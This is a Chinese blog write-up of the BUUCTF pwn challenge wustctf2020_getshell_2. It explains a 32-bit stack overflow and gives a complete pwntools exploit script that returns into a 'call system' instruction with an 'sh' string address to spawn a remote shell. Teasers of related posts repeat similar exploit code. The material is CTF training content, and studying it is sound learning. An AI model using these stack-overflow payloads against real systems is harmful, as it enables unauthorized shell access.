wustctf2020_getshell_2

最新推荐文章于 2024-11-19 16:39:22 发布
最新推荐文章于 2024-11-19 16:39:22 发布
阅读量2.5k 收藏 2
点赞数 1
CC 4.0 BY-SA版权
分类专栏: BUU-PWN 文章标签: 安全 系统安全 pwn 网络安全 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0sway/article/details/121899924
本文讲述了在WUSTCCTF2020_getshell_2任务中,通过检查和IDA分析发现了一个栈溢出漏洞。挑战者需利用system函数的间接调用,避开直接写'/bin/sh',找到隐藏的后门地址。作者详细介绍了利用ROP技术和payload构造过程,最终实现远程shell获取。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

wustctf2020_getshell_2

使用checksec查看:
在这里插入图片描述
只开启了栈不可执行,应该和1一样是道栈溢出题目。

放进IDA中查看:
在这里插入图片描述
在这里插入图片描述
和1一样主函数中给出漏洞函数,漏洞函数中直接一个栈溢出。

但是后门函数并没有直接给出system(/bin/sh),而是给了system("/bbbbbbbbin_what_the_f?ck__--??/sh")

这样就不能直接调用后门函数进行getshell。虽然没有给/bin/sh,但是这串字符串的最后sh可以用作参数,同样可以获取到shell。

记录下地址:0x08048670
在这里插入图片描述
也可以使用ROPgadget直接找出地址:
在这里插入图片描述

但是没法利用system@plt地址,因为plt地址需要返回值,可溢出的地址位数不够0x24-0x18=0xc,所以只能用shell()里的call system来调用system,call函数不用返回值了,它会自己把下一条指令给压进去

exp:

from pwn import *

#start
r = remote("node4.buuoj.cn",29609)
# r = process("../buu/wustctf2020_getshell_2")

#params
sh_addr = 0x08048670
system_addr = 0x08048529

#attack
payload = b'M'*(0x18+4) + p32(system_addr) + p32(sh_addr)
r.recv()
r.sendline(payload)

r.interactive()
buuctf wustctf2020_getshell_2 ret2shellcode
weixin_45441024的博客
12-01 747
BUUCTF wustctf2020_getshell_2 check一下,32位的程序且没有开任何保护 用ida打开,vuln很明显这是一个漏洞函数,f5查看一下伪代码,可以看到buf距离栈底0x18个字节 这是shell函数的伪代码,我们可以看到虽然这个并不是我们想要的shell(不是/bin/sh),但是程序里面有sh的字符串可以供我们利用,那我们现在就查找一下"sh"所在的位置 $ ROPgadget --binary '/home/pwn/Desktop/wustctf2020_getshe
pwn旅行之[WUSTCTF 2020]getshell2(一些小知识)_pwn ctf shell
m0_60452141的博客
05-17 893
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
[buuctf]wustctf2020_getshell_2
逆向萌新的博客
07-03 467
[buuctf]wustctf2020_getshell_2
[BUUCTF-pwn]——wustctf2020_getshell_2
Y_peak的博客
03-19 523
[BUUCTF-pwn]——wustctf2020_getshell_2 有system没有sh。所以找一下 exploit from pwn import * p = remote('node3.buuoj.cn',25464) sh = 0x08048670 payload = 'a' * (0x18 + 4) + p32(0x08048529) + p32(sh) p.sendline(payload) p.interactive()
wustctf2020_getshell
m0sway的博客
11-28 857
wustctf2020_getshell 使用checksec查看: 只开启了一个栈不可执行,没开Canary,考虑栈溢出题目。 拉进IDA中查看: 主函数中直接给漏洞函数,跟进: read()函数,能读取0x20的数据,buf距离ebp0x18,因为这是个32位的程序,ebp+4后还能放下一个one_gadget 首先考虑下这个程序本身有没有get_shell的函数,通过搜索字符串可以发现函数shell(): ok了,这题直接秒了。 exp: from pwn import * #start
[BUUCTF]-PWN:wustctf2020_easyfast解析(fastbin double free)
2301_79326813的博客
02-06 464
又是堆题,查看保护再看ida大致就是alloc创建堆块,free释放堆块,fill填充堆块,以及一个getshell的函数,但要满足条件。值得注意的是free函数没有清空堆块指针所以可以用double free有两种解法。
[BUUCTF]-PWN:wustctf2020_number_game解析(补码,整数漏洞)
2301_79326813的博客
03-02 326
查看保护查看ida大致意思就是输入一个数绕过if。
BUUCTF pwn——wustctf2020_getshell_2
CNS-Enterprise BCC-1701-J
05-23 248
BUUCTF 做题练习
pwn旅行之[WUSTCTF 2020]getshell2(一些小知识)
qq_66013948的博客
02-07 699
Linux下查找文件(find、grep命令)_linux查找文件-优快云博客find 路径 -name "文件名"之后就是根据题目猜测flag文件的名字,最后通过上一条语句进行查找,当然,如果猜不到,那么还是只有挨个找了。
[BUUCTF]PWN——wustctf2020_getshell1/2
mcmuyanga的博客
11-11 1669
wustctf2020_getshell 附件 步骤: 例行检查,32位程序,开启了NX保护 本地试运行一下程序,看看大概的情况 32位ida载入,习惯性的检索程序里的字符串,发现了后门函数 shell_addr=0x804851B main函数开始看程序 vulnerable函数 buf参数存在溢出漏洞,正好溢出8位,让我们覆盖到ret exp: from pwn import* r=remote('node3.buuoj.cn',29690) shell_addr=0x804851B
[buuctf]wustctf2020_getshell
逆向萌新的博客
07-02 796
[buuctf]wustctf2020_getshell
[WUSTCTF 2020]getshell
沈理大学牲的博客
11-14 315
发现后门函数 shell,并且在vuin函数存在栈溢出。file 和checksec 检查文件。一道简单的ret2text。
BUUCTF】wustctf2020_getshell 1(自留用)
最新发布
2302_79275647的博客
11-19 835
(注意:nc node5.buuoj.cn 25369即nc+地址+端口号)(有的新版本需要格式【checksec --file=文件名】查看){具体保护权限可以搜索关键词“pwn基础保护”或相关的文(引用致歉)在CTFOS里需要【pwn checksec --file=文件名】(有的版本终端直接输入【checksec+文件名】就可以查看)(有疑问可以问AI“pwn题目里为什么要寻找shell函数”)有疑问可以问AI“pwn题目里为什么要寻找main函数”输入【wget (空格) 复制的链接】
[BUUCTF-pwn]——wustctf2020_getshell
Y_peak的博客
03-16 233
[BUUCTF-pwn]——wustctf2020_getshell 额,太简单了直接上exploit吧 直接利用栈溢出,修改返回地址就好 from pwn import * p = remote('node3.buuoj.cn',28241) payload = 'a' * (0x18+4) + p32(0x0804851B) p.send(payload) p.interactive()
攻防世界get_shell
03-16
"攻防世界"是一个网络安全竞赛平台,"get_shell" 是其中一种比赛任务类型。该任务的目标是通过漏洞攻击,成功获得目标系统的 Shell 权限,从而掌控该系统。这是一个非常具有挑战性的任务,需要竞赛选手具备扎实的计算机安全知识和技能,才能成功完成任务。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值